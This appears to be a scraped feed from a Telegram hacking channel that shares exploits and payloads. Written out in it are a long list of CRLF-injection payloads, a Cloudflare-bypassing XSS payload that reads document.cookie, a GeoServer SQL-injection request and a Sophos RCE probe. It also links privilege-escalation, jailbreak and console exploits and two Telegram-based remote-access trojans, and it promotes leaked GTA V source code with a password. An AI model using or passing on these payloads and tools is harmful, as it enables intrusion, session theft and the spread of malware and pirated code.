CVE-2023-41772 - UIFuckUp exploit to gain system privileges as user on Windows 10 (1809 and up) and 11
Github
#CVE #Exploit #Windows
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#CVE #Exploit #Windows
——————
0Day.Today
@LearnExploit
@Tech_Army
GitHub
GitHub - R41N3RZUF477/CVE-2023-41772
Contribute to R41N3RZUF477/CVE-2023-41772 development by creating an account on GitHub.
CRLF Injection Payloads
#CRLF #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
%0AHeader-Test:Bug
%0A%20Header-Test:Bug
%20%0AHeader-Test:Bug
%23%OAHeader-Test:Bug
%E5%98%8A%E5%98%8DHeader-Test:Bug
%E5%98%8A%E5%98%8D%0AHeader-Test:Bug
%3F%0AHeader-Test:Bug
crlf%0AHeader-Test:Bug
crlf%0A%20Header-Test:Bug
crlf%20%0AHeader-Test:Bug
crlf%23%OAHeader-Test:Bug
crlf%E5%98%8A%E5%98%8DHeader-Test:Bug
crlf%E5%98%8A%E5%98%8D%0AHeader-Test:Bug
crlf%3F%0AHeader-Test:Bug
%0DHeader-Test:Bug
%0D%20Header-Test:Bug
%20%0DHeader-Test:Bug
%23%0DHeader-Test:Bug
%23%0AHeader-Test:Bug
%E5%98%8A%E5%98%8DHeader-Test:Bug
%E5%98%8A%E5%98%8D%0DHeader-Test:Bug
%3F%0DHeader-Test:Bug
crlf%0DHeader-Test:Bug
crlf%0D%20Header-Test:Bug
crlf%20%0DHeader-Test:Bug
crlf%23%0DHeader-Test:Bug
crlf%23%0AHeader-Test:Bug
crlf%E5%98%8A%E5%98%8DHeader-Test:Bug
crlf%E5%98%8A%E5%98%8D%0DHeader-Test:Bug
crlf%3F%0DHeader-Test:Bug
%0D%0AHeader-Test:Bug
%0D%0A%20Header-Test:Bug
%20%0D%0AHeader-Test:Bug
%23%0D%0AHeader-Test:Bug
\r\nHeader-Test:Bug
\r\n Header-Test:Bug
\r\n Header-Test:Bug
%5cr%5cnHeader-Test:Bug
%E5%98%8A%E5%98%8DHeader-Test:Bug
%E5%98%8A%E5%98%8D%0D%0AHeader-Test:Bug
%3F%0D%0AHeader-Test:Bug
crlf%0D%0AHeader-Test:Bug
crlf%0D%0A%20Header-Test:Bug
crlf%20%0D%0AHeader-Test:Bug
crlf%23%0D%0AHeader-Test:Bug
crlf\r\nHeader-Test:Bug
crlf%5cr%5cnHeader-Test:Bug
crlf%E5%98%8A%E5%98%8DHeader-Test:Bug
crlf%E5%98%8A%E5%98%8D%0D%0AHeader-Test:Bug
crlf%3F%0D%0AHeader-Test:Bug
%0D%0A%09Header-Test:Bug
crlf%0D%0A%09Header-Test:Bug
%250AHeader-Test:Bug
%25250AHeader-Test:Bug
%%0A0AHeader-Test:Bug
%25%30AHeader-Test:Bug
%25%30%61Header-Test:Bug
%u000AHeader-Test:Bug
//www.google.com/%2F%2E%2E%0D%0AHeader-Test:Bug
/www.google.com/%2E%2E%2F%0D%0AHeader-Test:Bug
/google.com/%2F..%0D%0AHeader-Test:Bug
#CRLF #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
Cloudflare XSS Bypass for reflected XSS ⚡️
#XSS #Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
<svg%20oNinad=1%20onload=alert(document.cookie)>
#XSS #Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
CVE-2023-46589 Apache Tomcat - Request Smuggling
Read
#CVE #Apache
——————
0Day.Today
@LearnExploit
@Tech_Army
Read
#CVE #Apache
——————
0Day.Today
@LearnExploit
@Tech_Army
HackerOne
Internet Bug Bounty disclosed on HackerOne: Possibility of Request...
CVE-2023-46589 Apache Tomcat - Request Smuggling
Severity: Important
Description:
Tomcat did not correctly parse HTTP trailer headers. A specially crafted
trailer header that exceeded the header...
Severity: Important
Description:
Tomcat did not correctly parse HTTP trailer headers. A specially crafted
trailer header that exceeded the header...
CVE-2023-50254 PoC Exploit for Deepin-reader RCE
POC
Read
#CVE #POC #Exploit
——————
0Day.Today
@LearnExploit
@Tech_Army
POC
Read
#CVE #POC #Exploit
——————
0Day.Today
@LearnExploit
@Tech_Army
CVE-2023-25157
#CVE #Poc
——————
0Day.Today
@LearnExploit
@Tech_Army
GET /geoserver/ows?service=wfs&version=1.0.0&request=GetFeature&typeNamosloe=gwpd:chinamap11&CQL_FILTER=strStartsWith%28Vatican City%2C%27x%27%27%29+%3D+true+and+1%3D%28SELECT+CAST+%28%28SELECT+version()%29+AS+INTEGER%29%29+--+%27%29+%3D+true HTTP/1.1
#CVE #Poc
——————
0Day.Today
@LearnExploit
@Tech_Army
CVE-2023-51385 - OpenSSH OS command injection vulnerability
Link
#CVE
——————
0Day.Today
@LearnExploit
@Tech_Army
Link
#CVE
——————
0Day.Today
@LearnExploit
@Tech_Army
Vin01’s Blog
SSH ProxyCommand == unexpected code execution (CVE-2023-51385)
Summary
CVE-2022-1040 - RCE in Sophos Firewall
#CVE #RCE
——————
0Day.Today
@LearnExploit
@Tech_Army
curl -sk -H "X-Requested-With: XMLHttpRequest" -X POST 'hxxps://x.x.x.x/userportal/Controller?mode=8700&operation=1&datagrid=179&json=\{"x":"test"\}' | grep -q 'Session Expired'
#CVE #RCE
——————
0Day.Today
@LearnExploit
@Tech_Army
سورس کد بازی GTA V لیک شد 🤯
در حال حاظر این سورس کد در دسترسه عموم قرار گرفته و در واقع میتونن هر تغییری که دوست دارن رو داخل GTA Online به کار ببرن .
در کنار اون کلی عکس از موتور بازی سازی ریج و همچنین قابلیت هاش در دسترس عموم قرار داره !
#Leak #Gta #News
——————
0Day.Today
@LearnExploit
@Tech_Army
در حال حاظر این سورس کد در دسترسه عموم قرار گرفته و در واقع میتونن هر تغییری که دوست دارن رو داخل GTA Online به کار ببرن .
در کنار اون کلی عکس از موتور بازی سازی ریج و همچنین قابلیت هاش در دسترس عموم قرار داره !
#Leak #Gta #News
——————
0Day.Today
@LearnExploit
@Tech_Army
0Day.Today | Learn Exploit | Zero World | Dark web |
سورس کد بازی GTA V لیک شد 🤯 در حال حاظر این سورس کد در دسترسه عموم قرار گرفته و در واقع میتونن هر تغییری که دوست دارن رو داخل GTA Online به کار ببرن . در کنار اون کلی عکس از موتور بازی سازی ریج و همچنین قابلیت هاش در دسترس عموم قرار داره ! #Leak #Gta #News…
GTA V full source code download⚡️
Download
If you need a Password :
ski naro joone amoo 😅
#Download
——————
0Day.Today
@LearnExploit
@Tech_Army
Download
If you need a Password :
Mi76#b>9mRed
ski naro joone amoo 😅
#Download
——————
0Day.Today
@LearnExploit
@Tech_Army
⭕️🚨🚨#فوری
🔻وزارت کشور ایران توسط تیم 3ackd0or هک شد.
🔻وقتی که کد رهگیری برگشتی را مجددا به سامانه میدهند، با تصاویر کارت ملی و اطلاعات هویتی 25 کاندید مشابه با فرد درخواست شده مواجه میشوند و به این شکل 24 در 7 به دنبال هویت واقعی شما از روی چهرههایتان هستند.
Twiter
#News #moi #Hack
➖➖➖➖➖➖➖➖
@LearnExploit
@Tech_Army
🔻وزارت کشور ایران توسط تیم 3ackd0or هک شد.
🔻وقتی که کد رهگیری برگشتی را مجددا به سامانه میدهند، با تصاویر کارت ملی و اطلاعات هویتی 25 کاندید مشابه با فرد درخواست شده مواجه میشوند و به این شکل 24 در 7 به دنبال هویت واقعی شما از روی چهرههایتان هستند.
Twiter
#News #moi #Hack
➖➖➖➖➖➖➖➖
@LearnExploit
@Tech_Army
Jailbreak for all arm64 iOS 16.0 to iOS 16.5 devices
Github
#IOS
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#IOS
——————
0Day.Today
@LearnExploit
@Tech_Army
GitHub
Release Def1nit3lyN0tAJa1lbr3akTool 0.999.3 · KpwnZ/Def1nit3lyN0tAJa1lbr3akTool
Changelog
Dynamic kernel patchfinder.
Dynamic dyld patchfinder.
Stop jailbreaking if it can not resolve offsets.
Known issues:
Sideloading would break something, please build with Xcode or use T...
Dynamic kernel patchfinder.
Dynamic dyld patchfinder.
Stop jailbreaking if it can not resolve offsets.
Known issues:
Sideloading would break something, please build with Xcode or use T...
TelegramRAT - Cross Platform Telegram based RAT that communicates via telegram
Github
#rat #windows #linux
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#rat #windows #linux
——————
0Day.Today
@LearnExploit
@Tech_Army
WebKit Exploit for PS4 6.x-9.6 / PS5 1.x-5.x
Github
#Exploit #PS4 #PS5
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#Exploit #PS4 #PS5
——————
0Day.Today
@LearnExploit
@Tech_Army
GitHub
GitHub - kmeps4/PSFree: PSFree WebKit Exploit for PS4 6.xx to 9.60 and PS5 1.xx to 5.xx
PSFree WebKit Exploit for PS4 6.xx to 9.60 and PS5 1.xx to 5.xx - kmeps4/PSFree
TelegramRat - Python RAT for Windows that uses Telegram
Github
#rat #windows
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#rat #windows
——————
0Day.Today
@LearnExploit
@Tech_Army
vless://7c87e6f5-5f67-4cff-a478-276e43a54b83@s.thisisforu.sbs:43978?type=tcp&security=none#GR_SV5_MCI_MTN-Learn_Exploit
——————
0Day.Today
@LearnExploit
@Tech_Army